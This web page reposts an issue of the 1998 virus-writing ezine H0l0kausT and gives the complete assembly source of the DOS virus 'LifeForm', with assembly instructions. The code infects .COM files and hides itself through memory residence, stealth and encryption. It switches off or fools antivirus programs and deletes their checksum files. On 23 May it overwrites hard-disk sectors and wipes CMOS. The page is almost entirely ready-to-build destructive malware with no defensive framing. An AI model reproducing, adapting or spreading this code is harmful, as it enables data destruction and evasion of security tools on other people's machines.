Copy Link
Add to Bookmark
Report

The LifeForm virus

H0l0kausT Issue 1

eZine's profile picture
Published in 
H0l0kausT
 · 1 year ago

; Virus Name:  LifeForm 
; Author : ThE_WiZArD
; Origin : Spain, 1998.
; Lenght : 2101 bytes aprox.
;
;
;
;⁄ƒƒƒƒƒƒƒƒƒƒƒƒø
;≥ Features ≥
;¿ƒƒƒƒƒƒƒƒƒƒƒƒŸ
;
; -Memory Resident (MCB) Encrypted parasitic virus.
; -Infects .COM files on Closing (3EH).
; -Full Stealth (Disinfection on OPEN (3Dh) & DEBUGGIN (4B01H) and reinfects
; on CLOSING (3Eh) ).
; -FCB & DTA Stealth (sec = 62)
; -Time Stealth (AX=5700h), returns correct seconds.
; -Uses SFT`s to perform infection (less size and fuck TSR watchdogs).
; -Redirects Int03h to Int21h (less size and fuck debuggers).
; -Hook Int 24h to a dummy handler to hide errors.
; -Anti-Debug , Emulation and Anti-Heuristic Code.
; -Turns off VSAFE`s flags while infecting files and restore them later.
; -Breaks F-PROT's ability of detecting viruses (Thx to Wintermute)
; -When AVPLITE anti-virus is executed, the virus modifies the command line
; so, heuristic analysus stays disabled.
; -Disable Stealth when a compress util are running.
;
; -Delete CRC Checksums ( In current DIR )
;
; -> anti-vir.dat
; -> avp.crc
; -> chklist.tav
; -> chklist.ms
; -> ivb.ntz
; -> smartchk.cps
;
; On 23th May destroy random sectors of hard disk , cmos and displays
; a funny payload.
;
;
;
;Thx go to: 29A staff.
;
;Fucks go to: Well , they know who they are.
;
;
;
; ThE_WiZArD
; wizard555@hotmailcom
;
;
;-=[ "Information is the greatest weapon of power to the modern wizard." ]=-

;
; To assembly: TASM /M LifeForm.ASM
; TLINK LifeForm
; EXE2COM LifeForm.EXE LifeForm.COM


.286
LifeForm segment byte public
assume cs:LifeForm,ds:LifeForm
org 0h


LifeForm_size equ (LifeForm_end-LifeForm_start)
Crypt_Size equ (Crypt_End-Crypt_Start)
Size_SB equ (Size_Sin_Buffer-LifeForm_Start)

LifeForm_start label byte


Delta_ofs equ word ptr $+1

mov bp,0100h ;Delta offset (precalc)

cli
neg sp ;Mess with Stack
neg sp ;TBCLEAN SUCKS !
sti

;*****************************************************************************
; ANTI-HEURISTIC DECRYPTOR *
;*****************************************************************************

Decrypt:
lea si,[bp+offset Crypt_Start]
mov di,si
push si
xor ax,ax
mov bx,Crypt_size/2+2

Xor_LOOP:
xor word ptr cs:[di],0000h ;XOR It !
nop
int 3h ;Fool Debugging
inc ax
jmp Fuck_TBAV2 ;FUCK Thunderbyte AV

Fuck_TBAV1:
jmp Fuck_TBAV3

Fuck_TBAV2:
add di,2h
jmp Fuck_TBAV1
Fuck_TBAV3:
cmp ax,bx ;Are we at the end?
jbe Xor_Loop ;No .. continue

ret ;Return

Crypt_Start label byte

;*****************************************************************************
; FOOL TRACING / EMULATION *
;*****************************************************************************
No_Trace:
cli
push ax ;Anti-Trace routine !
push -1 ;TBCLEAN catch this ;-)
inc sp
dec sp
pop ax
inc ax
pop ax
jz Check_for_TSR
mov al,2Eh ;CMOS: 2EH -> Checksum
out 70h,al ;Corrupt Checksum
out 71h,al
hlt ;Halt computer
int 19h ;Reboot

;*****************************************************************************
; CHECK FOR NOVELL AND TSR *
;*****************************************************************************
Check_for_TSR:
mov ax,':?' ;Check for TSR ...
int 21h
cmp bx,':*' ;Are we already
jne Install_MCB ;memory resident ?
jmp Return_File

LifeForm_LiveS db '#ThE_WiZArD' ;Of Course

;*****************************************************************************
; ROUTINE TO GO TSR *
;*****************************************************************************

Install_MCB:
mov al,21h ;Get Int21h
call Get_Int

mov word ptr cs:[OldInt21h][bp],bx ;Save Int21h
mov word ptr cs:[OldInt21h+02h][bp],es

mov ax,ds
dec ax
mov ds,ax ;Program's MCB segment
xor di,di

cmp byte ptr ds:[di],'Y' ;Is it a Z block?
ja MCB_OK ;YES !!
jmp Return_File ;No .. Exit ..

MCB_OK:
sub word ptr ds:[di+3],((LifeForm_Size/10h)+2)
sub word ptr ds:[di+12h],((LifeForm_Size/10h)+2)
add ax,word ptr ds:[di+3]
inc ax

mov ds,ax
mov byte ptr ds:[di],'Z' ;Mark block as Z
mov word ptr ds:[di+1],8 ;System memory
mov word ptr ds:[di+3],((LifeForm_Size/10h)+1)
mov word ptr ds:[di+8],4f44h ;Mark block as owned
mov word ptr ds:[di+0ah],0053h ;by DOS (444f53h,0)
inc ax

cld
push cs
pop ds
mov es,ax
mov cx,LifeForm_SiZe ;Copy virus to memory
mov si,bp
rep movsb

;*****************************************************************************
; SET INTERRUPTION 21H *
;*****************************************************************************

Set_int21h:
push es
pop ds

mov al,21h
mov dx, offset Int21h_LifeForm
call Set_Int ;Set new Int21h

Return_File:
push cs cs
pop ds es

;*****************************************************************************
; RESTORE .COM file AND SET REGISTERS = 0 *
;*****************************************************************************

Exit_COM:
mov bx,bp
lea si,HEADER
add si,bx
mov ax,100h
xchg ax,di
push di ;Return to program ...
movsw ;Copy four bytes
movsw

Reset_Reg:
xor ax,ax
sub bx,bx ;Set registers to 0
mov cx,bx
mov dx,bx
xor di,cx
sub si,di
xor bp,bp

ret ;Return to host

;*****************************************************************************
; FCB STEALTH *
;*****************************************************************************

Fcb_Stealth:
pushf
call dword ptr cs:[OldInt21h] ;Call to INT 21h
test al,al ;Error ?
jnz fcb_out ;Jmp if error

call push_all

mov ah,51h ;Get current psp
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

mov es,bx ;Es=segment of psp
cmp bx,es:[16h] ;psp of COMMAND.COM?
jnz fcb_out1 ;no, then jmp
mov bx,dx ;DS:BX=FCB
mov al,[bx] ;1st byte of fcb
push ax ;save it

mov ah,2fh ;get DTA in ES:BX
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7

Fcb_old:
cmp word ptr es:[bx+09h],'OC' ;It`s a .COM file ?
jne Fcb_out1

mov al,es:[bx+17h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh ;62 seconds ?
jnz fcb_out1

and byte ptr es:[bx+17h],0E0h ;Erase erronous sec.

Fcb_SUB:
sub word ptr es:[bx+1dh],Size_SB ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;Sub with carry flag

Fcb_out1:
call pop_all ;Restore registers
Fcb_out:
iret ;Return control

;*****************************************************************************
; NEW INTERRUPT 21h *
;*****************************************************************************

Int21h_LifeForm:
cli
push ax ;Anti-Trace routine !
push -1 ;Kasp :-P
inc sp
dec sp
pop ax
inc ax
pop ax
jz Tsr_Check
iret
Tsr_Check:
sti
cmp ax,':?' ;Check for TSR ?
jnz Int21h_Check
mov bx,':*' ;Return :* !
iret

Int21h_Check:
xchg ax,bx
cmp bh,11h ;FCB Stealth
je STEALTH_fcb
cmp bh,12h
je STEALTH_fcb
cmp bh,4Eh ;HANDLE Stealth
je STEALTH_Hnd
cmp bh,4Fh
je STEALTH_Hnd
cmp bx,4b00h ;DELETE CrC shit
je Delete_Shit
cmp bx,4b01h ;DISINFECT File
je Disinfection
cmp bh,3Dh ;DISINFECT File
je Disinfection
cmp bh,6Ch ;DISINFECT File
je Disinfection
cmp bx,5700h ;HIDE Erroneous sec.
je STEALTH_Sec
cmp bh,3fh ;Fuck F-PROT
je Stealth_READ
cmp bh,3Eh ;INFECT File
je Infection
xchg ax,bx

ExitInt21h:
db 0eah ;Exit ...
Oldint21h dw ?,? ;Original Int 21h

Oldint24h dw ?,? ;Original int 24h
OldInt03h dw ?,?

Newint24h:
mov al,3 ;Return error in
iret ;function

Stealth_FCB:
xchg ax,bx
jmp FCB_Stealth

Stealth_HND:
xchg ax,bx
jmp HANDLE_Stealth

Stealth_READ:
xchg ax,bx
jmp Shit_F_PROT

Delete_Shit:
xchg ax,bx
jmp Check_Names

Disinfection:
xchg ax,bx
jmp disinfect_file

Infection:
xchg ax,bx
jmp Infect_File

;****************************************************************************
; DATE/TIME STEALTH *
;****************************************************************************

Stealth_Sec:
xchg ax,bx
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc ok_get_time

stc
retf 02h

ok_get_time:
push cx

and cx,1fh ;Unmask second field
xor cx,1fh ;62 seconds ?
pop cx
jne exit_get_time

or cl,01fh ;Changes seconds

exit_get_time:
clc
retf 02h

;*****************************************************************************
; HANDLE STEALTH *
;*****************************************************************************

Handle_Stealth:
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc Handle_OK

stc
retf 02h
Handle_OK:
call push_all ;Push this shit !

call get_env

cmp ax,"-F" ;F-PROT (Fuck POTATOE)
jz not_infected

cmp ax,"RA" ;ARJ
jz not_infected

cmp ax,"AR" ;RAR
je not_infected

cmp ax,"KP" ;PK*
je not_infected

cmp ax,"HL" ;LHA
je not_infected

cmp ax,"AB" ;BACKUP
je not_infected

mov ah,2Fh ;get DTA
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

mov al,es:[bx+16h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh
jnz not_infected

sub word ptr es:[bx+1ah],Size_SB ;Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds

not_infected:
call pop_all ;Restore registers
retf 02h

;*****************************************************************************
; MAKE "F-PROT" DOESNT DETECT ANY VIRUS *
;*****************************************************************************

Avers db 'Quo vadis Fridrik? ... and you Frans still working on this shit.'

; Breaks F-prot's ability of detecting viruses: when it reads data from a
; file the virus sends the interrupt vector table , so F-prot doesn't
; detect any virus (Thx to Wintermute)

Shit_F_PROT:
call push_all
cmp al,1
jz Exit_READ
cmp bx,8
jnz Exit_READ

call get_env

cmp ax,"-F" ;F-PROT ?
jnz Exit_READ

call pop_all

pushf
call dword ptr cs:[Oldint21h]
call push_all
push ds dx
pop di es ;Send interrupt
xor si,si ;vector table
mov ds,si
rep movsb

call pop_all ;Quo Vadis Fridrik ?
retf 2

Exit_READ:
call pop_all
jmp ExitInt21h

;*****************************************************************************
; RUTINE TO INFECT *
;*****************************************************************************

Infect_File:
cmp bx,4h ;Erroneous handle ?
ja Infect_OK
jmp ExitInt21h ;Bye Bye .. !

Error: jmp Exit

Infect_OK:
call push_all ;Save this shit ;)
call Disable_KB ;Disable Keyboard
call Set_Int03h ;Set NewInt03h

call Vsafe_off ;Turn off Vshit ;)

mov ah,45h
int 03h ;Duplicate handle

Close_Cont:
xchg bx,ax
push ax

mov ah,3Eh ;Close new handle in
int 03h ;order to update
pop bx ;directory entry

call Get_SFT ;Get Da`SFT

Check_File:
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error

Check_Size:
cmp word ptr es:[di+11h],0F63Bh ;It is > 63k ?
ja Error

call Check_Infect ;It is infected ?
jc Error

Check_COMM:
mov ax,word ptr es:[di+20h] ;COMMAND.COM ?
cmp ax,'OC'
jnz Save_Stuff
mov ax,word ptr es:[di+22h]
cmp ax,'MM'
jz Error

Save_Stuff:
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx

xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax

push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position

in ax,40h ;Get Encryption KEY
or ax,ax
jnz Key_OK
inc ax

Key_Ok:
mov word ptr cs:[Clave],ax ;Save key

Read_Header:
call Lseek_START

push cs
pop ds ;CS=DS

mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4h bytes
int 03h

Check_Header:
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jne Infect_COM
jmp Restore

Infect_COM:
cmp word ptr cs:[Header+00h],20CDh ;Int20h Instruction ?
jz Restore ;Exit !
cmp byte ptr cs:[Header+00h],90h ;InVircible bait?
jz Restore ;Exit !

call Lseek_END

mov delta_ofs,ax ;Store Delta Offset
add delta_ofs,100h

sub ax,3h
mov word ptr cs:[jump_address+1],ax ;Set the JMP Address

push di bx es cs ;Save Stuff
pop es ;CS=ES

cld
mov di,offset XOR_LOOP ;DI= Our Buffer

mov word ptr es:[DI],812Eh ;XOR WORD PTR CS:
inc di
inc di

Gen_INDEX_DI:
mov byte ptr es:[DI],35h ;[DI]
inc di
Gen_KEY:
mov ax,word ptr cs:[Clave] ;Move the decryption
stosw ;KEY

call Copy&Crypt ;Copy & Encrypt virus

pop es bx di

call Lseek_END

call Set_Int24h ;Set NewInt24h

mov ah,3Fh ;Write Virus
inc ah
lea dx,Buffer ;Encrypted virus
mov cx,Size_SB ;Virus size
int 03h
jc Restore

call Lseek_START

mov ah,3Fh
inc ah
lea dx,Jump_Address ;Write JMP
mov cx,4h
int 03h

call Rest_Int24h

Restore:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position

pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute

pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode

call Res_Stuff

Exit:
call Vsafe_on
call Rest_Int03h
call Enable_KB
call pop_all ;Restore this shit !
jmp ExitInt21h ;Exit ...

;****************************************************************************
; DISINFECTION *
;****************************************************************************

Disinfect_file:
call push_all ;Save this shit ;-)
call Set_Int03h

cmp ax,6c00h ;Extended open ?
jz extended
mov si,dx
Extended:
mov di,ds

call Vsafe_Off ;Turn OFF Vshit

Open_Dsf:
mov ds,di ;Opens the file !
mov dx,si
xor cx,cx
mov ax,3D00h
int 03h
jnc Open_OK
jmp Exit

Open_OK:
call Set_Int24h

xchg ax,bx
call get_sft ;Get Da`SFT
jc Error_Dsf

cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error_Dsf

Check_Inff:
call Check_Infect ;Is it infected ?
jc Save_This

Error_Dsf:
jmp Exit_Close

Save_This:
call Disable_KB

mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx

xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax

push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position

push cs ;CS=DS
pop ds

call Lseek_START

mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4 bytes
int 03h

mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jz Rest_all


Read_OrigHeader:
mov ax,word ptr es:[di+11h] ;Get filesize
sub ax,4h ;Lseek 4 bytes before
mov word ptr es:[di+15h],ax ;end

mov ah,3fh
mov cx,04h ;Read original header
lea dx,Header
int 03h

call Lseek_START

Write_OrigHeader:
mov ah,3fh ;Write original
inc ah ;Header
mov cx,4h ;COM header
lea dx,Header
int 03h

call Lseek_END

call Res_Time&Lenght

Rest_all:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position

pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute

pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode

call Res_Stuff

Exit_Close:
mov ah,3eh ;Close file
int 03h

call Rest_Int24h
jmp exit

;*****************************************************************************
; ADD PARAMETERS TO COMMAND LINE OF AVP *
;*****************************************************************************

check_names:
call push_all

mov si,dx

find_ext:
lodsb

cmp al,'.' ;Scan for the dot in
jne find_ext ;the filename
std

lodsw

xor cx,cx
mov di,offset AV_scanner - 1
push cs
pop es

name_loop:
mov cl,byte ptr cs:[di] ;CS:DI = size of
dec di ;String
push si
repe cmpsb ;Compare the names
pop si
je found_name ;Found AVP ?
sub di,cx

cmp di,offset found_avplite
jbe tail_1_fail

jmp short name_loop

found_name:
cmp di,offset found_avplite ;AVPlite
jbe avplite_fix

jmp short tail_1_fail

avplite_fix:
cld ;Change command line
pop es
push es ;ES = param block
;Segment

mov di,word ptr es:[bx+2] ;Get command tail from
mov si,di ;Param block
mov ax,word ptr es:[bx+4]
mov es,ax
mov ds,ax ;Command tail!

inc di ;Increase till we are
;past tail count

cmp byte ptr [si],0 ;Any parameters ??
je avplite_tail

mov cx,127 ;Tail length
mov al,0dh
repne scasb
jne tail_1_fail

avplite_tail:
add byte ptr [si],8 ;Move our pointer?
push cs
pop ds

mov si,offset avplite_cmd ;AV param to add?
mov cx,9
rep movsb

tail_1_fail:
cld ;Ready to finish up?
call pop_all
jmp Delete_CrC

;****************************************************************************
; SAVE ALL REGISTERS IN THE STACK *
;****************************************************************************

Push_all:
cli
pop word ptr cs:[ret_off]
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push word ptr cs:[ret_off]
sti
ret

;****************************************************************************
; RESTORE ALL REGISTERS FROM THE STACK *
;****************************************************************************

Pop_all:
cli
pop word ptr cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push word ptr cs:[ret_off]
sti
ret

ret_off dw 0000h

;*****************************************************************************
; GET SYTEM ENVIRONMENT *
;*****************************************************************************

Get_Env:
mov ah,62h
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

dec bx
mov es,bx
mov ax,word ptr es:[0008h]
ret

;*****************************************************************************
; SET NEW INTERRUP 24h AND REDIRECT INT 21H OVER INT 03H *
;*****************************************************************************

Set_Int03h:
push ax bx ds es cs
pop ds

mov al,03h ;Get Int03h
call get_int

mov word ptr ds:[OldInt03h],bx ;Save it
mov word ptr ds:[OldInt03h+02h],es
mov dx,offset Call_Int21h ;Redirects to Int21h
call set_int

pop es ds bx ax
ret

Rest_Int03h:
push ax dx ds

mov al,03h ;Restore Int03h
lds dx,dword ptr cs:[OldInt03h]
call set_int

pop ds dx ax
ret

Set_Int24h:
push ax bx ds es cs
pop ds

mov al,24h ;Get Int24h
call get_int

mov word ptr ds:[OldInt24h],bx ;Save it
mov word ptr ds:[OldInt24h+02h],es
mov dx,offset NewInt24h ;Redirect to a dummy
call set_int ;routine ;)

pop es ds bx ax
ret

Rest_Int24h:
push ax dx ds

mov al,24h ;Restore Int24h
lds dx,dword ptr cs:[OldInt24h]
call set_int

pop ds dx ax
ret

;*****************************************************************************
; RETURN THE <AL> VECTOR in <ES:BX> *
;*****************************************************************************

Get_int:
push ax
xor ah,ah
rol ax,1
rol ax,1
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax

ret

;*****************************************************************************
; SET <AL> INTERRUPT VECTOR to <DS:DX> *
;*****************************************************************************

Set_int:
push ax
push bx
push ds
cli
xor ah,ah
rol ax,1
rol ax,1
xchg ax,bx
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax

ret

;*****************************************************************************
; LSEEK ROUTINES *
;*****************************************************************************

Lseek_START:
mov word ptr es:[di+15h],00h ;Lseek to Start
ret
Lseek_END:
mov ax,word ptr es:[di+11h] ;File length
mov word ptr es:[di+15h],ax ;Lseek to end
ret

;*****************************************************************************
; ROUTINE TO GET SFT *
;*****************************************************************************

Get_SFT:
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)

mov ax,1216h ;Get System File Table
mov bl,es:[di] ;system file table entry
int 2fh ;(LIST) number
pop bx ;Restore the Handle
ret

;*****************************************************************************
; RUTINE CHECK INFECT *
;*****************************************************************************

Check_Infect:
clc

mov cx,word ptr es:[di+0dh] ;Time from SFT
mov dx,word ptr es:[di+0fh] ;Date from SFT

mov word ptr cs:[org_time],cx ;Save original time
mov word ptr cs:[old_date],dx ;Save file date

or cl,1fh
mov word ptr cs:[old_time],cx ;Save file time (62s)

mov cx,word ptr cs:[org_time] ;Get original time

and cl,1fh
xor cl,1fh ;62 sec ?
jnz Ret_No ;File infected

stc
Ret_No:
ret

;*****************************************************************************
; RUTINE TO RESTORE STUFF *
;*****************************************************************************

Res_Stuff:
mov cx,word ptr ds:[old_time] ;Restore file time
mov dx,word ptr ds:[old_date] ;Restore file date

mov ax,5700h
inc ax
int 03h
ret

Res_Time&Lenght:

push ax
sub ax,06h ;Lseek 06 bytes before
mov word ptr es:[di+15h],ax ;end

mov ah,3fh
mov cx,2 ;Read original TIME
mov dx,offset ds:[Old_Time] ;Save it
int 03h

pop ax ;File length
sub ax,Size_SB ;Sub virus size
mov word ptr es:[di+15h],ax ;Lseek to end of
mov ah,3fh ;real file
inc ah
xor cx,cx
int 03h ;Remove the virus

ret


;*****************************************************************************
; RUTINE TO COPY AND ENCRYPT THE VIRUS *
;*****************************************************************************

Copy&Crypt:
xor si,si ;Copy virus to buffer
mov di,offset Buffer
mov cx,Size_SB/2+1 ;Virus size
repe movsw

mov si,(offset Buffer+(Crypt_Start-LifeForm_Start)) ;Our Buffer
mov di,si
mov cx,Crypt_size/2+1 ;Virus size
mov dx,word ptr cs:[Clave] ;Key


Encrypt:
xor word ptr [di],dx ;Encrypts the copy
movsw
loop Encrypt
ret

;*****************************************************************************
; RUTINE TO CALL INT_21h *
;*****************************************************************************

Call_Int21h:
pushf
call DWORD PTR cs:[OldInt21h] ;Call Int 21h
retf 02h

;*****************************************************************************
; FUCK VSAFE ANTIVIRUS *
;*****************************************************************************

Vsafe_OFF:
push bx cx dx

mov ax,0fa02h ;Turn off VSAFE's flags
mov dx,5945h
mov bl,00000000b ;New flags :-)
int 03h
mov byte ptr cs:[VShit],cl ;Save flags.

pop dx cx bx

ret

Vsafe_ON:
push bx cx dx

mov ax,0fa02h
mov dx,5945h ;Restore VSAFE's flags
mov bl,byte ptr cs:[VShit]
and bl,11111011b ;Turn off write-protected
int 03h ;flag (cache stuff)

pop dx cx bx

ret

;*****************************************************************************
; DISABLE/ENABLE KEYBOARD *
;*****************************************************************************

Disable_KB:
in al,21h
or al,00000010b
out 21h,al ;Disable KeyBoard
ret
Enable_KB:
in al,21h ;Enable KeyBoard
and al,not 2
out 21h,al
ret

;*****************************************************************************
; DELETE CRC FILES *
;*****************************************************************************
Delete_crc:
call push_all
call Set_Int03h ;Set new Int24h & 03h
call Set_Int24h
call Vsafe_Off

Check_Date:
mov ah,2bh ;Get Date
dec ah
int 03h
cmp dx,0517h ;23th May ?
jne Delete_CONT
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp PAYLOAD ;Go to PAYLOAD !!

Delete_CONT:
push cs
pop ds

xor cx,cx

lea dx,kill_msav ;Chklist.ms
call kill_crc_files

lea dx,kill_tbav
call kill_crc_files

lea dx,kill_smartchk ;Smartchk.cps
call kill_crc_files

lea dx,kill_avp ;Avp.crc
call kill_crc_files

lea dx,kill_ivb ;Ivb.ntz
call kill_crc_files

lea dx,kill_chklist ;Chklist.tav
call kill_crc_files

Exit_Delete:
call Vsafe_ON
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all

jmp ExitInt21h

kill_crc_files:
mov ax,4300h ;Clear Atributes
inc ax
int 03h

mov ah,41h ;Delete File
int 03h
retn

;*****************************************************************************
; DATA ABOUT ANTI-ANTIVIRUS *
;*****************************************************************************

; Names of antivirus

found_avplite db 'AVPLITE',7 ;AntiVirusPro

Av_Scanner:

; CRC files to delete!

kill_tbav db 'ANTI-VIR.DAT',0
kill_msav db 'CHKLIST.MS',0
kill_smartchk db 'SMARTCHK.CPS',0
kill_avp db 'AVP.CRC',0
kill_ivb db 'IVB.NTZ',0
kill_chklist db 'CHKLIST.TAV',0


; Parameters to ADD on the command line!

avplite_cmd db ' /h',0dh ;Skip heuristic scan


;*****************************************************************************
; !! ACTIVATION ROUTINE !! *
;*****************************************************************************
PAYLOAD:
call Disable_KB

mov ax,0002h ;Clear Screen
int 10h

call push_all

push cs cs
pop ds es

PREP_VIDEO:
mov ah,13h ;Set values
mov al,0
mov bh,0
mov bl,14
mov cx,45
mov dh,8 ;Line
mov dl,14 ;Position
lea bp,MENSAJE
int 10h ;Print messagge

mov bl,0fh
mov cx,52
mov dh,12
mov dl,10
lea bp,MENSAJE2 ;Messagge
int 10h ;Print messagge

mov cx,57
inc dh
lea bp,MENSAJE3 ;Messagge
int 10h ;Print messagge

call pop_all


;*****************************************************************************
; DESTROY THE HARDDISK *
;*****************************************************************************
Rip_hd:
xor dx, dx ;Clear dx
Rip_hd1:
mov cx, 1 ;Track 0, sector 1
mov ax,5000h
mov bx,0311h
xchg ax,bx
mov dl,80h
mov es,bx
int 13h ;Kill 17 sectors
jae rip_hd2
xor ah, ah
int 13h ;Reset disks if needed
Rip_hd2:
inc dh ;Increment head number
cmp dh, 4 ;If head number is below 4
jb rip_hd1 ;then go kill another 17
inc ch ;sectors increase track
cmp ch,69h ;number ... 69 tracks ?
jb rip_hd

kill_cmos1:
mov bp,7C00h
mov cx,29Ah ;Hello Dudes !

kill_cmos2:
mov al,cl
out 70h,al ;CMOS !!
xor al,al
out 71h,al ;Overwrite CMOS
loop kill_cmos2
jmp $ ;I love this ;)


MENSAJE DB 'ƒƒ [LifeForm] coded by ThE_WiZArD (1998) ƒƒ'
MENSAJE2 DB 'Cooler than a body on ice, Hotter than a rollin`dice'
MENSAJE3 DB 'Wilder than a drunken fight ... You`re gonna burn tonight'

Clave dw 0
Today db 0
Vshit db 0
Jump_address db 0E9h,90h,90h,01h ;JMP Address

Crypt_end label byte
DoNothing dw 0
Old_date dw 0 ;File date
Old_time dw 0 ;File time
Org_time dw 0
HEADER db 0CDh,020h,90h,01h ;Original 4 bytes

Size_Sin_Buffer:

Buffer db (offset Buffer-offset LifeForm_Start) dup (0)


LifeForm_end label byte
LifeForm ends
end LifeForm_start

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT